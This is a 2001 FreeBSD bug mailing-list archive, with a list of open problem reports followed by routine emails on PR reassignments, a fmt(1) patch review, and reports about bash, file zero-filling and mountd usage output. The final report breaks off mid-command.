[PATCH] fstat does not recognize FIFO's o [2001/04/17] kern/26638 kern.fast_vfork sysctl doesn't do anythin o [2001/04/17] ports/26642 ports (Corrected) New port: russian/tac+ia o [2001/04/17] kern/26644 sos [PATCH] ATA/ATAPI driver doesn't implemen a [2001/04/17] misc/26646 srand() provides only 8-bit table o [2001/04/17] misc/26649 diskless client can't share root with ser o [2001/04/17] misc/26653 RTL8012 ethernet not listed in LINT or ha o [2001/04/17] misc/26658 update to src/usr.bin/calendar/calendars/ a [2001/04/17] bin/26663 [patch] ru_RU.KOI8-R message catalog for o [2001/04/18] ports/26670 ports ports/biology/molden has a checksum error o [2001/04/18] misc/26678 Correction of: misc/26521 o [2001/04/18] bin/26686 Freeze at boot from 4.3-RC4 floopies - US o [2001/04/18] bin/26689 logname returns error when passing opts a o [2001/04/18] docs/26692 doc boot manpage describes bootfile prompt in o [2001/04/18] misc/26695 CHANGE REQUEST: kill(all) -l output f [2001/04/19] ports/26700 ports icecast gobbling up 80% of the CPU o [2001/04/19] misc/26720 Both .cshrc and .profile should have the o [2001/04/20] kern/26740 rwatson [PATCH] jail improvement o [2001/04/21] misc/26742 doc misleading information in handbook f [2001/04/21] bin/26746 dmesg only prints the last couple of line o [2001/04/21] kern/26748 Aironet tcpdump wedge bug still exists o [2001/04/21] ports/26759 ports databases/pgaccess port superfluous o [2001/04/22] misc/26763 darrenr installing ipfilter sample files to share o [2001/04/22] conf/26770 jkh sysinstall does not generate correct rc.c o [2001/04/22] ports/26773 ports Update editors/joe to version 2.9.6 o [2001/04/22] conf/26774 Installation of rmail, even without sendm o [2001/04/22] i386/26786 Installing on Legacy Free Systems a [2001/04/22] kern/26787 sysctl change request o [2001/04/22] ports/26788 obrien ratfor name incorrect? o [2001/04/23] ports/26793 ports New port: java/ibm-jdk o [2001/04/23] kern/26798 cvsup 4.3-RC -> 4.3-STABLE causes problem o [2001/04/23] kern/26800 Support for Netgear MA-301 wireless o [2001/04/23] ports/26801 ports cyrus port should add periodic file to pr o [2001/04/23] ports/26802 will can't make new directories in kde o [2001/04/23] bin/26803 des Fix fetch to allow FTP puts in '-o' & all a [2001/04/23] bin/26810 dd [PATCH] make cut(1) work with long lines o [2001/04/24] i386/26812 old bootstrap /sys/i386/boot/... still in o [2001/04/24] bin/26817 hm isdnd in fullscreen-mode fails to detect o [2001/04/24] conf/26818 hm Bad default value for isdn_fsdev in /etc/ o [2001/04/24] ports/26825 ports port xmms-avi won't compile libavixmms.so o [2001/04/24] misc/26833 `route change default' broken when gatewa f [2001/04/25] conf/26846 gshapiro /etc/aliases is not used any more a [2001/04/25] ports/26851 knu Buglet breaks cvsweb in Perl5 environment o [2001/04/25] bin/26854 Better fix for ESS Technology Maestro-2E o [2001/04/25] docs/26861 doc accept(2) manpage documents non-existant o [2001/04/25] ports/26865 dima kpilot requires kdecore3 lib even when kd o [2001/04/26] misc/26870 change request for daily security check a [2001/04/26] ports/26872 olgeni ports/devel/wedit has a checksum error o [2001/04/26] misc/26879 mkfilter not installed, yet referred to v o [2001/04/26] ports/26882 will KDE should use ca-roots port for SSL cert o [2001/04/26] ports/26884 ports new port for visualworks 5i.3 o [2001/04/26] kern/26885 add if_xe as kernel module a [2001/04/26] bin/26886 dd mount -w doesn't work on a normally read- o [2001/04/26] ports/26889 ports New port: pam_ldap by padl.com for authen o [2001/04/27] ports/26904 jim New port(?): net/everybuddy-i18n (i18n pa o [2001/04/27] ports/26908 ports New Port: mpqc a quantum chemistry progra o [2001/04/28] ports/26913 trevor NEW PORT: security/pam_smb o [2001/04/28] kern/26917 HP ScanJet 4300C not recognized by ugen o [2001/04/28] bin/26919 jkh sysinstall' fdisk can ONLY set bootable f f [2001/04/28] ports/26930 ports (NEW PORT) Virtual Terrain SDK o [2001/04/28] ports/26931 ports (NEW PORT) Virtual Terrain Applications o [2001/04/29] bin/26943 will [patch] description of :C modifier is mis o [2001/04/29] kern/26955 marcel-bugsPatches to get the DVD-ROM ioctl()s in th o [2001/04/29] ports/26957 ports [NEW PORT] security/pam_mount o [2001/04/29] ports/26976 marcel [PORT UPDATE] emulators/linux_base o [2001/04/30] ports/26983 jseger can't compile libwww o [2001/04/30] ports/26986 ports New port: japanese/pycodec o [2001/04/30] ports/26988 ports New port: korean/pycodec o [2001/04/30] misc/26990 jkh no sawfish package in 4.3-release ISO o [2001/04/30] ports/26993 billf update port: net/mtr o [2001/04/30] i386/26994 AMD Athlon Thunderbird not known to ident o [2001/04/30] ports/26997 ports Update/New port: math/scilab 2.6 o [2001/04/30] ports/26998 knu japanese/chasen is old o [2001/05/01] kern/27008 kernel function sysbeep(xxx, 0) does prod o [2001/05/01] misc/27017 printf(3) man page doesn't document "%ll{ o [2001/05/01] ports/27019 marcel patch supplied in PR ports/26976 breaks l o [2001/05/02] docs/27027 doc Update src/share/misc/iso639 o [2001/05/02] bin/27029 strptime: %s formatting missing (patch) o [2001/05/02] ports/27032 ports [mnt port update] www/p5-HTML-Embperl o [2001/05/02] ports/27038 ports Postfix ports don't install the rmail scr o [2001/05/02] misc/27039 new syscons screensaver o [2001/05/02] docs/27040 doc rc(8) and syscons(4) talk about rc.conf.l o [2001/05/02] misc/27041 modify src/release/Makefile to make anoth o [2001/05/02] misc/27043 jkh WindowMaker missing from FreeBSD 4.3 ISO o [2001/05/02] ports/27049 ports ports/net/rinetd not correctly became a d a [2001/05/02] bin/27050 dd [PATCH] Add snapshot functionality to las o [2001/05/02] misc/27051 [PATCH] /usr/sbin/named.restart does not o [2001/05/03] bin/27063 darrenr /sbin/ipfs missing a [2001/05/03] ports/27065 ports databases/db3 shared libraries & symbolic o [2001/05/03] bin/27068 w and who do not show users / utmp stays o [2001/05/03] conf/27070 darrenr save/restore IP Filter's state tables at o [2001/05/04] ports/27075 sobomax Port java/javavmwrapper installs no man p o [2001/05/04] ports/27079 sobomax Improvements for javavmwrapper? o [2001/05/06] bin/27163 sh trap TSTP () deadly hangs f [2001/05/06] ports/27166 ports pcnfsd.tar.Z doesn't exist o [2001/05/06] ports/27167 ports ETHOberonV4 won't run o [2001/05/07] ports/27182 mharo Teach portlint to recognize RUN_DEPENDS=$ o [2001/05/07] ports/27187 jmz add linux ioctl handler to dri xf86-403 c o [2001/05/07] bin/27188 fix of rsh non-interactive mode behaviour o [2001/05/07] ports/27189 ports ports/comms/hylafax completely broken o [2001/05/07] misc/27190 Day light savings in Mexico. f [2001/05/07] misc/27195 dougb /etc/services file out of date o [2001/05/08] ports/27200 greid new port: bed (binary editor) o [2001/05/08] bin/27205 Listing all users in the passwd file o [2001/05/08] ports/27206 ports ports/astro/xtide missing harmonics.gz f o [2001/05/08] docs/27209 doc [PATCH] ascii.7 table rearrangement and u o [2001/05/08] bin/27218 mjacob fix included -- restore drops files on ta o [2001/05/08] ports/27219 fenner mbone/nte can't run o [2001/05/09] kern/27232 On NFSv3 mounted filesystems, stat return o [2001/05/09] ports/27239 fenner Update ports: mbone/vic 2.8ucl-1.1.3 a [2001/05/10] misc/27251 dd [PATCH]: netstat -s typos s [2001/05/10] ports/27256 dirk mod_php4 doesn't include pspell support i o [2001/05/10] bin/27258 getty didn't check if if= isn't empty a [2001/05/10] ports/27260 ade Nautilus port does not build. o [2001/05/11] ports/27266 kevlo Port textproc/xerces should be named xerc o [2001/05/11] ports/27267 ports New port: www/zope-zwiki o [2001/05/11] bin/27268 fdisk does not recognize Linux extended p o [2001/05/11] kern/27269 Cannot mount linux extended (logical) par o [2001/05/11] bin/27270 sys/soundcard.h fails to define AFMT_S16_ a [2001/05/11] ports/27272 ports New Port: John McCalpin's STREAM Benchmar o [2001/05/12] bin/27281 vidcontrol(1) does not have error codes o [2001/05/12] ports/27282 mharo Proftpd with__modldap seems to be broken f [2001/05/12] bin/27283 brian netstat -i missing IPv4 input packet coun o [2001/05/12] bin/27289 green SSH don't do correct diagnostic when no r a [2001/05/12] misc/27290 Slovak(sk) locale was not present o [2001/05/12] ports/27291 jim Bluefish port doesn't build mo files o [2001/05/12] bin/27294 paul pkg_update disregards suffixes (portrevis o [2001/05/13] ports/27300 ports ImageMagick-5.3.1 doesn't build on 4.2 o [2001/05/13] ports/27305 ports problem with drop downs in linux-netscape o [2001/05/13] i386/27306 obrien hw watchpoints work unreliable under gdb o [2001/05/13] ports/27307 ports patch for mail/rblcheck ignores quiet fla o [2001/05/14] misc/27311 pthread_attr_setscope always fails o [2001/05/14] ports/27313 ports New port to ports collection: Geheimnis-2 o [2001/05/14] bin/27319 obrien df displays amd pid processes o [2001/05/14] docs/27320 doc excessively vague information in pppoe pa o [2001/05/14] ports/27323 trevor Port out of date. o [2001/05/14] ports/27326 reg Request upgrade of libtool to 1.4 in /usr o [2001/05/14] ports/27329 ports New ports: mbone/relate o [2001/05/15] ports/27332 ports New port: swedish/staroffice52 o [2001/05/15] kern/27334 load average constantly above 1.0, even w o [2001/05/15] ports/27335 ports New port: The module provides a simple i o [2001/05/15] kern/27342 change-request o [2001/05/15] ports/27349 ache UPDATE comms/ecu o [2001/05/15] ports/27355 trevor UPDATE irc/kvirc o [2001/05/15] ports/27357 joe UPDATE net/jabber o [2001/05/15] ports/27362 adrian UPDATE www/squid23 o [2001/05/15] ports/27369 kevlo UPDATE net/vtun o [2001/05/16] bin/27374 Added bold color to the /bin/ls color sup o [2001/05/16] ports/27396 ports New port based on Espen Skoglund's 1.4.5 o [2001/05/29] kern/27750 [PATCH] Promise Ultra100 TX2 unsupported o [2001/05/29] ports/27751 ports New port: databases/p5-DBIx-SearchBuilder o [2001/05/29] ports/27755 ports webfonts port assumes /usr/X11R6/bin is i o [2001/05/29] bin/27757 chapss(1) converts a large uid to a negat o [2001/05/29] docs/27758 doc ptrace(2) man page outdated o [2001/05/29] ports/27762 ports New port submission: devel/glg 0.2.a o [2001/05/30] ports/27770 kiri UPDATE mail/prom-mew o [2001/05/30] ports/27772 kiri UPDATE mail/prom-wl o [2001/05/30] ports/27773 kris UPDATE www/adzap o [2001/05/30] ports/27774 ports MASTER_SITES update : benchmarks/xengine o [2001/05/30] kern/27777 gensetdefs.pl generates invalid code for f [2001/05/30] bin/27780 des [PATCH] fetch(1): don't divide by zero wh o [2001/05/31] ports/27788 ports New port: graphics/ppmcaption: A utility o [2001/05/31] ports/27791 ports New port: textproc/dadadodo: Text process o [2001/05/31] kern/27792 n_hibma can't detect I-O DATA USB-ET/TX(USB Ether f [2001/05/31] bin/27796 brian Use of -v flag of date(1) can give non-in o [2001/05/31] ports/27797 ports MASTER_SITES update : devel/gvd o [2001/05/31] misc/27799 jkh Improve IP address checking in sysinstall o [2001/05/31] ports/27800 ports New port: devel/p5-Getopt-Long (Getopt::L o [2001/05/31] gnu/27803 Enhancement to sort(1) o [2001/05/31] ports/27804 ports New port: databases/p5-DBIx-DataSource (D o [2001/05/31] ports/27805 ports New port: SQL-Ledger Accounting o [2001/05/31] ports/27806 ports New Port: Docs for the ScrollZ irc client o [2001/06/01] ports/27808 ports New port: www/cgichk: A web site vulnerab o [2001/06/01] ports/27809 ports new port: net/samplicator o [2001/06/01] conf/27811 bad order of rpc.lockd and rpc.statd star o [2001/06/01] ports/27814 ports New port: java/jdom o [2001/06/01] ports/27815 ports Does not exist the port mutt-devel o [2001/06/01] misc/27816 rpcgen -b generates server code which doe o [2001/06/01] ports/27822 ports MASTER_SITES update : x11-wm/epplets o [2001/06/01] ports/27824 ports New port: pdftohtml and pdftops-converter o [2001/06/01] ports/27825 ports MASTER_SITES update : x11-wm/ctwm o [2001/06/01] ports/27828 ports /usr/ports/lang/eperl fails to build o [2001/06/01] misc/27829 kris pax's uid/gid cache is read-only o [2001/06/02] ports/27831 ports New port: benchmarks/siege: A http regres o [2001/06/02] docs/27833 doc No man page for locate.rc o [2001/06/02] kern/27834 Cannot warm-reboot Compaq AP400 due to SC o [2001/06/02] kern/27835 execve() doesn't conform to execve(2) spe o [2001/06/02] ports/27836 ports New port: Trafcount is loadable module fo o [2001/06/02] ports/27837 roam devel/entity port update o [2001/06/02] ports/27838 keichii dot.emacs is 600 o [2001/06/02] gnu/27842 cp has weird errors trying to copy from e o [2001/06/02] docs/27843 doc [PATCH] make.conf WITH_* variables aren't o [2001/06/02] ports/27845 ports UPDATE mail/postfix-current o [2001/06/02] kern/27847 acpi dislikes ASUS CUSL-2 o [2001/06/02] ports/27848 ports New port: du2ps - filter for converting o o [2001/06/02] kern/27849 dfr AGP RELEASE ioctl frees memory o [2001/06/02] ports/27850 ports UPDATE misc/heyu a [2001/06/03] kern/27851 yar gif interfaces don't have IFF_RUNNING fla o [2001/06/03] ports/27856 ports Update port: sysutils/msyslog o [2001/06/03] bin/27858 dd There is no urandom(4) man page o [2001/06/03] ports/27863 ports Delete net/netatalk-asun o [2001/06/03] ports/27864 ports [MAINTAINER UPDATE] net/pdnsd 1.1.1->1.1. a [2001/06/03] ports/27867 roam email address change o [2001/06/03] ports/27868 ports New port: graphics/gdchart o [2001/06/04] ports/27869 ports Port update: security/cksfv (MAINTAINER) o [2001/06/04] ports/27871 ports Port update: sysutils/lavaps (MAINTAINER) o [2001/06/04] misc/27872 "Load Config" (sysinstall) hangs Compaq D o [2001/06/04] ports/27873 ports security/arirang - WebServer auditing too f [2001/06/04] ports/27876 fenner upgrade ports/net/tcptrace to 6.0.0a5 1880 problems total. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 11:23: 1 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7FBD637B401; Mon, 4 Jun 2001 11:22:59 -0700 (PDT) (envelope-from will@FreeBSD.org) Received: (from will@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54IMxo61215; Mon, 4 Jun 2001 11:22:59 -0700 (PDT) (envelope-from will) Date: Mon, 4 Jun 2001 11:22:59 -0700 (PDT) From: Message-Id: <200106041822.f54IMxo61215@freefall.freebsd.org> To: will@FreeBSD.org, freebsd-bugs@FreeBSD.org, jlemon@FreeBSD.org Subject: Re: bin/26665: [PATCH] syslogd hangs when logging from remote hosts Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: [PATCH] syslogd hangs when logging from remote hosts Responsible-Changed-From-To: freebsd-bugs->jlemon Responsible-Changed-By: will Responsible-Changed-When: Mon Jun 4 11:21:48 PDT 2001 Responsible-Changed-Why: Jonathan, you said in private mail that you would look at this. That was about a month or 6 weeks ago, and this bug still exists and seems to be in dire need of fixing. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=26665 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 11:27:26 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from whale.sunbay.crimea.ua (whale.sunbay.crimea.ua [212.110.138.65]) by hub.freebsd.org (Postfix) with ESMTP id A76CB37B403; Mon, 4 Jun 2001 11:27:17 -0700 (PDT) (envelope-from ru@whale.sunbay.crimea.ua) Received: (from ru@localhost) by whale.sunbay.crimea.ua (8.11.2/8.11.2) id f54IRCU67006; Mon, 4 Jun 2001 21:27:12 +0300 (EEST) (envelope-from ru) Date: Mon, 4 Jun 2001 21:27:12 +0300 From: Ruslan Ermilov To: audit@FreeBSD.org Cc: bugs@FreeBSD.org Subject: New fmt(1) Message-ID: <20010604212712.A35399@sunbay.com> Mail-Followup-To: audit@FreeBSD.org, bugs@FreeBSD.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! http://people.FreeBSD.org/~ru/fmt.patch is a new version of fmt(1) utility submitted originally in PR 5901, and evolved since in OpenBSD. It is basically the OpenBSD version plus ctype(3), WARNS=2, and manpage formatting cleanup. Committing this will close the following PRs: bin/5901, bin/12242, bin/19071 Please review. Cheers, -- Ruslan Ermilov Oracle Developer/DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 11:39:19 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9BC5A37B403; Mon, 4 Jun 2001 11:39:17 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54IdHu62992; Mon, 4 Jun 2001 11:39:17 -0700 (PDT) (envelope-from ru) Date: Mon, 4 Jun 2001 11:39:17 -0700 (PDT) From: Message-Id: <200106041839.f54IdHu62992@freefall.freebsd.org> To: ru@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/27753: ATA driver in FreeBSD 4.2 and later no longer recognizes CompactFlash Media reader Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Old Synopsis: CompactFlash Media reader broken with FreeBSD 4.2 and later ATA-driver New Synopsis: ATA driver in FreeBSD 4.2 and later no longer recognizes CompactFlash Media reader Responsible-Changed-From-To: gnats-admin->freebsd-bugs Responsible-Changed-By: ru Responsible-Changed-When: Mon Jun 4 11:30:11 PDT 2001 Responsible-Changed-Why: Misfiled. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27753 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 11:41:21 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2555937B401; Mon, 4 Jun 2001 11:41:20 -0700 (PDT) (envelope-from pirzyk@FreeBSD.org) Received: (from pirzyk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54IfK763221; Mon, 4 Jun 2001 11:41:20 -0700 (PDT) (envelope-from pirzyk) Date: Mon, 4 Jun 2001 11:41:20 -0700 (PDT) From: Message-Id: <200106041841.f54IfK763221@freefall.freebsd.org> To: pirzyk@FreeBSD.org, freebsd-bugs@FreeBSD.org, pirzyk@FreeBSD.org Subject: Re: bin/27240: df does not support -l option Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: df does not support -l option Responsible-Changed-From-To: freebsd-bugs->pirzyk Responsible-Changed-By: pirzyk Responsible-Changed-When: Mon Jun 4 11:39:16 PDT 2001 Responsible-Changed-Why: Assigned the bug to myself to see that it gets commited (the fixes that is, not the bug or the committer :) http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27240 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 11:42:32 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 398F237B407; Mon, 4 Jun 2001 11:42:31 -0700 (PDT) (envelope-from pirzyk@FreeBSD.org) Received: (from pirzyk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54IgVR63395; Mon, 4 Jun 2001 11:42:31 -0700 (PDT) (envelope-from pirzyk) Date: Mon, 4 Jun 2001 11:42:31 -0700 (PDT) From: Message-Id: <200106041842.f54IgVR63395@freefall.freebsd.org> To: pirzyk@FreeBSD.org, freebsd-bugs@FreeBSD.org, pirzyk@FreeBSD.org Subject: Re: kern/21132: setting kern.hostid to 2887705710 fails. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: setting kern.hostid to 2887705710 fails. Responsible-Changed-From-To: freebsd-bugs->pirzyk Responsible-Changed-By: pirzyk Responsible-Changed-When: Mon Jun 4 11:41:44 PDT 2001 Responsible-Changed-Why: Picked up this bug report to work on. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=21132 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 12:40:18 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5962F37B401; Mon, 4 Jun 2001 12:40:17 -0700 (PDT) (envelope-from pirzyk@FreeBSD.org) Received: (from pirzyk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54JeHr73858; Mon, 4 Jun 2001 12:40:17 -0700 (PDT) (envelope-from pirzyk) Date: Mon, 4 Jun 2001 12:40:17 -0700 (PDT) From: Message-Id: <200106041940.f54JeHr73858@freefall.freebsd.org> To: pirzyk@FreeBSD.org, freebsd-bugs@FreeBSD.org, pirzyk@FreeBSD.org Subject: Re: bin/23083: pkg_add returns 0 even if the package is not found Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: pkg_add returns 0 even if the package is not found Responsible-Changed-From-To: freebsd-bugs->pirzyk Responsible-Changed-By: pirzyk Responsible-Changed-When: Mon Jun 4 12:39:51 PDT 2001 Responsible-Changed-Why: Picked up another of my open PR's http://www.FreeBSD.org/cgi/query-pr.cgi?pr=23083 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 12:56:21 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6CBF537B405; Mon, 4 Jun 2001 12:56:19 -0700 (PDT) (envelope-from pirzyk@FreeBSD.org) Received: (from pirzyk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54JuJd80094; Mon, 4 Jun 2001 12:56:19 -0700 (PDT) (envelope-from pirzyk) Date: Mon, 4 Jun 2001 12:56:19 -0700 (PDT) From: Message-Id: <200106041956.f54JuJd80094@freefall.freebsd.org> To: Jim.Pirzyk@disney.com, pirzyk@FreeBSD.org, freebsd-bugs@FreeBSD.org, pirzyk@FreeBSD.org Subject: Re: conf/18569: tool source not installed Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: tool source not installed State-Changed-From-To: open->closed State-Changed-By: pirzyk State-Changed-When: Mon Jun 4 12:55:12 PDT 2001 State-Changed-Why: Closed since this was a specific release problem with src/tools not being included with the src tarballs. Responsible-Changed-From-To: freebsd-bugs->pirzyk Responsible-Changed-By: pirzyk Responsible-Changed-When: Mon Jun 4 12:55:12 PDT 2001 Responsible-Changed-Why: Picked up to close right away http://www.FreeBSD.org/cgi/query-pr.cgi?pr=18569 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 14:10: 6 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4737C37B403 for ; Mon, 4 Jun 2001 14:10:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54LA3712094; Mon, 4 Jun 2001 14:10:03 -0700 (PDT) (envelope-from gnats) Date: Mon, 4 Jun 2001 14:10:03 -0700 (PDT) Message-Id: <200106042110.f54LA3712094@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Bernd Luevelsmeyer Subject: Re: misc/19388: bash prompt problem, or perhaps curses problem Reply-To: Bernd Luevelsmeyer Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR misc/19388; it has been noted by GNATS. From: Bernd Luevelsmeyer To: freebsd-gnats-submit@FreeBSD.org Cc: Subject: Re: misc/19388: bash prompt problem, or perhaps curses problem Date: Mon, 04 Jun 2001 23:04:36 +0200 Steve Kettle mailed me to ask about the state about this old (and closed) problem, and much to my surprise I found it's gone now. I don't know when it vanished. I can't reproduce it anywhere. The oldest system I've got access to is a 4.2-Stable from Jan 4 2001 and has a bash "GNU bash, version 2.04.0(1)-release (i386--freebsd4.1.1)", and there it's gone too. Greetings, B. Luevelsmeyer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 14:40:15 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6712837B405 for ; Mon, 4 Jun 2001 14:40:07 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54Le7b15492; Mon, 4 Jun 2001 14:40:07 -0700 (PDT) (envelope-from gnats) Date: Mon, 4 Jun 2001 14:40:07 -0700 (PDT) Message-Id: <200106042140.f54Le7b15492@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Kris Kennaway Subject: Re: kern/25974: Holes in files do not zero-fill Reply-To: Kris Kennaway Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/25974; it has been noted by GNATS. From: Kris Kennaway To: Jim Zelenka Cc: Kris Kennaway , freebsd-gnats-submit@freebsd.org Subject: Re: kern/25974: Holes in files do not zero-fill Date: Mon, 4 Jun 2001 14:36:27 -0700 On Sat, Jun 02, 2001 at 04:45:08PM -0400, Jim Zelenka wrote: > >For some reason this response did not appear in GNATS. I asked Dima > >to re-forward it. > > That's probably my fault; I sent two responses. In the first, I said > that I'd checked briefly, and I didn't see the problem. In the > second one, I said that more extensive testing made the problem > appear. The problem is particularly likely to occur on busy systems > or systems where lots of files were created and deleted between > runs of the test program. I suspect that the problem is that something > is not zeroing out a block that is getting reallocated, and so > old bits are coming back, but that's only based on empirical observation, > and not a reading of the code. We did fix a bug with this kind of symptoms a while back (and released an advisory; perhaps that is related?) Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 14:40:18 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BB97337B406 for ; Mon, 4 Jun 2001 14:40:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54Le3u15456; Mon, 4 Jun 2001 14:40:03 -0700 (PDT) (envelope-from gnats) Received: from bofh.internal.moreton.com.au (ppp4.adsl238.pacific.net.au [203.143.238.4]) by hub.freebsd.org (Postfix) with ESMTP id 2BDC437B401 for ; Mon, 4 Jun 2001 14:32:16 -0700 (PDT) (envelope-from pdh@moreton.com.au) Received: (from pdh@localhost) by bofh.internal.moreton.com.au (8.11.3/8.11.3) id f54LWCx25243; Tue, 5 Jun 2001 07:32:12 +1000 (EST) (envelope-from pdh) Message-Id: <200106042132.f54LWCx25243@bofh.internal.moreton.com.au> Date: Tue, 5 Jun 2001 07:32:12 +1000 (EST) From: Phil Homewood Reply-To: pdh@moreton.com.au To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.113 Subject: bin/27878: [PATCH] mountd has incorrect usage output Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27878 >Category: bin >Synopsis: [PATCH] mountd has incorrect usage output >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 04 14:40:03 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Phil Homewood >Release: FreeBSD 4.3-STABLE i386 >Organization: >Environment: System: FreeBSD bofh.internal.moreton.com.au 4.3-STABLE FreeBSD 4.3-STABLE #0: Thu May 24 09:36:06 EST 2001 root@bofh.internal.moreton.com.au:/usr/obj/usr/src/sys/BOFH i386 >Description: mountd gives incorrect usage instructions when given a bad exports file >How-To-Repeat: tail -f /var/log/messages & echo "/foo 192.168.0.0 -mask 255.255.255.0" > /etc/exports" killall -HUP mountd echo "/foo -net 192.168.0.0 -mask 255.255.255.0" > /etc/exports" killall 